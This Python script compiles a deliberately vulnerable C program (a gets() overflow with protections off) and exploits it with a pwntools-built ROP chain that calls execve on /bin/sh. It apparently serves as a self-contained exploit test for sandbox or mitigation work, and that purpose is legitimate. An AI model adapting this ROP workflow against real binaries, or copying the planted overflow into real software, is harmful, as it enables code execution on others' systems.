
#!/usr/bin/env python
# coding: utf-8
#
# stack-pivot: Perform a simple ROP with a stack pivot.
# Copyright (c) 2024 Ali Polatel <alip@chesswob.org>
# SPDX-License-Identifier: GPL-3.0

import os, sys, subprocess, shutil, time

# Check if pwntools is installed.
try:
    from pwn import context, ELF, process, log, cyclic, cyclic_find, ROP
except ImportError as e:
    sys.stderr.write("[!] Pwntools is not installed. Exiting: %r\n" % e)
    sys.exit(127)
else:
    context.terminal = ["echo", "ENOTTY"]

if context.arch not in ("amd64", "i386"):
    log.warn("This script only works on X86 ATM. Exiting.")
    sys.exit(127)

# Constants
BUF_SIZE = 8
TEMP_FILES = ["vuln.c", "vuln", "rop.bin", "rop.txt", "pwned"]


def compile_vuln():
    # C code for the vulnerable program.
    vuln_c_code = """
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Symbol to /bin/sh for convenience.
 */
char *sh = "/bin/sh";

/*
 * 1. We use argv so tests work under busybox.
 * 2. We use a one-shot command to avoid stdin races.
 */
char *sh_argv[] = {
    "/bin/sh",
    "-cex",
    "echo 'ROP: Change return success. "
          "Going and coming without error. "
          "Action brings good fortune.'; "
    "sleep 1; "
    "touch pwned; "
    "exit 42",
    NULL,
};

int overflow(void) {{
    char buf[8];
    gets(buf); /* Vulnerable to buffer overflow */
    return 0;
}}

int main(void) {{
    overflow();
    if (getuid() + getpid() == 0) {{
#ifdef __x86_64__
        __asm__ __volatile__ (
            "pop %rdi; ret;"
            "pop %rsi; ret;"
            "pop %rdx; ret;"
            "pop %rax; ret;"
        );
#endif
        execve("/bin/sh", 0, 0);
    }}
    return 0;
}}
    """

    # Write the C code to a file.
    log.info("Writing C code to vuln.c")
    with open("vuln.c", "w") as f:
        f.write(vuln_c_code)

    # Compile the vulnerable program.
    cc_cmd = ("cc -ansi -pedantic "
        "-g -O0 -Wall "
        "-fno-stack-protector -no-pie "
        "-static vuln.c -o vuln "
        "-Wl,-no-pie",
        "-Wl,-z,now -Wl,-z,relro "
        "-Wl,--whole-archive "
        "-lc -lpthread -lrt -ldl -lm "
        "-Wl,--no-whole-archive")
    log.info("Compiling the vulnerable program.")
    log.info(f"{cc_cmd}")
    try:
        result = subprocess.run(
            cc_cmd,
            shell=True,
            check=True,
            stderr=subprocess.PIPE,
            stdout=subprocess.PIPE,
        )
        log.info(result.stderr.decode())
        log.info(result.stdout.decode())
    except subprocess.CalledProcessError as e:
        log.warn(
            f"Compilation of vulnerable program failed. Exiting.\n{e.stderr.decode()}"
        )
        sys.exit(127)


def generate_rop():
    # Set context for pwntools.
    context.binary = "./vuln"
    elf = ELF("./vuln")

    # Ensure core dumps are unlimited.
    log.info("Setting core dump size to unlimited.")
    try:
        subprocess.run(
            ["prlimit", "--pid", str(os.getpid()), "--core=unlimited"], check=True
        )
    except subprocess.CalledProcessError:
        log.warn("Failed to set core dump size to unlimited.")
        log.warn("The next step may fail.")

    # Generate a cyclic pattern and send it to the vulnerable program.
    log.info("Generating cyclic pattern to find offset.")
    pattern = cyclic(128)
    p = process("./vuln")
    p.sendline(pattern)
    p.wait()

    # Extract the core dump.
    core = p.corefile
    arch = context.arch

    if arch == "amd64" or arch == "i386":
        stack_pointer = "rsp"
    elif arch == "arm" or arch == "aarch64":
        stack_pointer = "sp"
    else:
        log.warn(f"Unsupported architecture: {arch}")
        sys.exit(127)

    offset = cyclic_find(core.read(getattr(core, stack_pointer), 4))
    log.info(f"Offset is {offset}.")

    log.info(f"Removing coredump file '{core.path}'")
    try:
        os.remove(core.path)
    except:
        log.warn(f"Failed to remove coredump file '{core.path}'")

    # Clear ROP cache.
    try:
        ROP.clear_cache()
    except:
        pass

    # Find ROP gadgets.
    log.info("Finding ROP gadgets and locating '/bin/sh'")
    rop = ROP(elf)

    # Find /bin/sh string.
    bin_sh = next(elf.search(b"/bin/sh"))
    log.info("Located '/bin/sh' at %#x." % bin_sh)

    # Find argument array.
    sh_argv = elf.symbols.get("sh_argv")
    log.info("Located 'sh_argv' at %#x." % sh_argv)

    # Construct the payload.
    log.info("Constructing the ROP chain.")
    payload = b"A" * offset  # Overflow buffer.

    # Add ROP chain to the payload.
    rop.call("execve", [bin_sh, sh_argv, 0])
    payload += rop.chain()

    # Print payload for debugging
    log.info("ROP payload is %d bytes." % len(payload))
    print(rop.dump(), file=sys.stderr)
    with open("rop.txt", "w") as f:
        print(rop.dump(), file=f)
    log.info("ROP textual dump saved to 'rop.txt' for inspection.")

    # Save the ROP details to a file.
    with open("rop.bin", "wb") as f:
        f.write(payload)

    log.info("ROP payload saved to file 'rop.bin'")
    log.info('Do "stack-pivot run" in the same directory to perform exploitation.')


def run_exploit(timeout="10"):
    timeout=int(timeout)

    # Load the ROP details from the file.
    with open("rop.bin", "rb") as f:
        payload = f.read()

    # Function to attempt exploit without using pwntools
    def attempt_exploit(timeout=10):
        try:
            p = subprocess.Popen(["./vuln"], stdin=subprocess.PIPE)

            log.info("Writing the ROP payload to vulnerable program's standard input.")
            p.stdin.write(payload + b"\n")

            log.info("Flushing vulnerable program's standard input.")
            p.stdin.flush()

            log.info("Closing vulnerable program's standard input.")
            p.stdin.close()

            log.info(f"Waiting for {timeout} seconds...")
            p.wait(timeout=timeout)
        except subprocess.TimeoutExpired:
            log.warn("Timeout expired!")
            return False
        except Exception:
            try: p.kill()
            except: pass
            return False
        return p.returncode == 42 and os.path.exists("pwned")

    # Attempt the exploit up to 10 times.
    max_attempts = 10
    for attempt in range(max_attempts):
        log.info("Running the vulnerable program.")
        log.info(f"Attempt {attempt + 1} of {max_attempts} with {timeout} seconds timeout.")
        if attempt_exploit(timeout):
            log.warn("Successfully smashed the stack using a ROP chain!")
            sys.exit(42)
        else:
            log.info(f"Attempt {attempt + 1} failed.")

    log.info("All attempts failed.")
    sys.exit(0)


def clean():
    for temp_file in TEMP_FILES:
        if os.path.exists(temp_file):
            shutil.rmtree(temp_file)


def print_help():
    print("Usage:")
    print("stack-pivot init  - Runs the preparation")
    print("stack-pivot run   - Runs the exploitation")
    print("stack-pivot clean - Runs the cleanup")
    print("stack-pivot help  - Prints this help message")
    print("stack-pivot       - Prints this help message")


def main():
    if len(sys.argv) < 2:
        print_help()
        sys.exit(0)
    elif sys.argv[1] == "init":
        compile_vuln()
        generate_rop()
    elif sys.argv[1] == "run":
        run_exploit(sys.argv[2] if len(sys.argv) > 2 else "10")
    elif sys.argv[1] == "clean":
        clean()
    else:
        print_help()
        sys.exit(0)


if __name__ == "__main__":
    main()
